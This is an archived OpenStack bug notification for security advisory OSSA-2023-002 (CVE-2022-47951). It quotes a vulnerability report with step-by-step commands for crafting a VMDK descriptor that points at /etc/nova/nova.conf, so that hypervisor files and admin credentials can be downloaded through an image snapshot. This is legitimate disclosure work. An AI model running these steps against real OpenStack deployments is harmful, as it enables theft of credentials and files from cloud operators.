yahoo-eng-team team mailing list archive

Thread
Date

[Bug 1996188] Re: [OSSA-2023-002] Arbitrary file access through custom VMDK flat descriptor (CVE-2022-47951)

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: OpenStack Infra <1996188@xxxxxxxxxxxxxxxxxx>
Date: Tue, 24 Jan 2023 15:51:59 -0000
Reply-to: Bug 1996188 <1996188@xxxxxxxxxxxxxxxxxx>
Sender: noreply@xxxxxxxxxxxxx

Reviewed:  https://review.opendev.org/c/openstack/ossa/+/871635
Committed: https://opendev.org/openstack/ossa/commit/07833d0dcd6f0745a7a487f55d5a23ff76d4c202
Submitter: "Zuul (22348)"
Branch:    master

commit 07833d0dcd6f0745a7a487f55d5a23ff76d4c202
Author: Jeremy Stanley <fungi@xxxxxxxxxxx>
Date:   Tue Jan 24 15:11:10 2023 +0000

    Add OSSA-2023-002 (CVE-2022-47951)
    
    Change-Id: If071ca13337d87f24bbbdec24cbecb826165f4f4
    Closes-Bug: #1996188


** Changed in: ossa
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1996188

Title:
  [OSSA-2023-002] Arbitrary file access through custom VMDK flat
  descriptor (CVE-2022-47951)

Status in Cinder:
  In Progress
Status in Glance:
  In Progress
Status in OpenStack Compute (nova):
  New
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  The vulnerability managers received the following report from
  Sébastien Meriot with OVH via encrypted E-mail:

  Our Openstack team did discover what looks like a security issue in Nova this morning allowing a remote attacker to read any file on the system.
  After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N).

  Here is the details :
  By using a VMDK file, you can dump any file on the hypervisor.
  1. Create an image: qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
  2. Edit the leak.vmdk and change the name this way: RW 2048 FLAT "leak-flat.vmdk" 0 --> RW 2048 FLAT "/etc/nova/nova.conf" 0
  3. Upload the image: openstack image create --file leak.vmdk leak.vmdk
  4. Start a new instance: openstack server create --image leak.vmdk --net demo --flavor nano leak-instance
  5. The instance won't boot of course. You can create an image from this instance: openstack server image create --name leak-instance-image leak-instance
  6. Download the image: openstack image save --file leak-instance-image leak-instance-image
  7. You get access to the nova.conf file content and you can get access to the openstack admin creds.

  We are working on a fix and would be happy to share it with you if needed.
  We think it does affect Nova but it could affect Glance as well. We're not sure yet.

  [postscript per Arnaud Morin (amorin) in IRC]

  cinder seems also affected

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1996188/+subscriptions